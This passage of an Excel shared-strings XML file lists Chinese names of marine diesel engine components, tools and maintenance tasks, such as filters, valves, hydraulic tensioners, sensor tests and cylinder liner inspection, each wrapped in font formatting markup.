      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油双重滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵连接</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通电磁阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挠性外部连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正常维护标配工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作齿轮工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作数据和设定点</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务期后的检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套内窥镜检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作干扰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮和空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反冲式滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本地监控，控制和安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机用传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承拆卸和安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀功能测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能数据记录</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀和喷油正时的设定</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮从动件和摇臂检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀的间隙检查和调节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵拆卸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修和更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀的检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵的检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反冲式过滤器的拆卸和检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油温控阀的检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器的检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水泵的检查和替换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器的调整和测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位传感器的调整和测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位移传感器的调整和测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率输出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮清洁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>--</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计套件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气滑阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油恒温阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温冷却器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低温和高低温混合管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本地控制装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速和接近传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器械</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器安装设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中冷器提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水接头杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉形中间块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停增压器装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴封布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配对法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腰型法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重型夹具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用保险丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套珩磨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口冲击扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡簧钳</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大型部件液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器，活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器，支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可拆卸绝缘盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件和参数</t>
    </r>
  </si>
  <si>
    <r>
      <t>ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>语言</t>
    </r>
  </si>
  <si>
